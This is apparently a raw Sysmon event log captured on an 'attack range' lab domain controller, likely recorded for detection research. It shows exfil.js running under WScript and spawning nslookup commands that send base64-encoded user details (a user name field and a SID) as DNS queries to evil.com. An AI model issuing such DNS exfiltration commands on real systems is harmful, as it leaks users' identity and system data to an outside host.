2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.926{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxaqik.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.910{2E1864BB-1903-629A-D946-000000005F02}47766140C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-DA46-000000005F02}928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.910{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.910{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.910{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.910{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.910{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-DA46-000000005F02}928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.910{2E1864BB-1903-629A-D846-000000005F02}33167792C:\Windows\system32\cmd.exe{2E1864BB-1903-629A-DA46-000000005F02}928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.912{2E1864BB-1903-629A-DA46-000000005F02}928C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1903-629A-D846-000000005F02}3316C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxaqik.tmp 2>&1 10341000x8000000000000000216928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.888{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-D946-000000005F02}4776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.888{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-D946-000000005F02}4776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.888{2E1864BB-1903-629A-D946-000000005F02}47766140C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-D846-000000005F02}3316C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.872{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-D946-000000005F02}4776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.872{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.872{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.872{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-D846-000000005F02}3316C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.872{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.872{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.857{2E1864BB-18E0-629A-6742-000000005F02}39762060C:\Windows\System32\WScript.exe{2E1864BB-1903-629A-D846-000000005F02}3316C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.871{2E1864BB-1903-629A-D846-000000005F02}3316C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxaqik.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.857{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbewg.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.825{2E1864BB-1903-629A-D646-000000005F02}62283588C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-D746-000000005F02}3916C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.825{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-D746-000000005F02}3916C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.825{2E1864BB-1903-629A-D546-000000005F02}78568112C:\Windows\system32\cmd.exe{2E1864BB-1903-629A-D746-000000005F02}3916C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.829{2E1864BB-1903-629A-D746-000000005F02}3916C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1903-629A-D546-000000005F02}7856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbewg.tmp 2>&1 10341000x8000000000000000216908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.789{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-D646-000000005F02}6228C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.789{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-D646-000000005F02}6228C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.789{2E1864BB-1903-629A-D646-000000005F02}62283588C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-D546-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 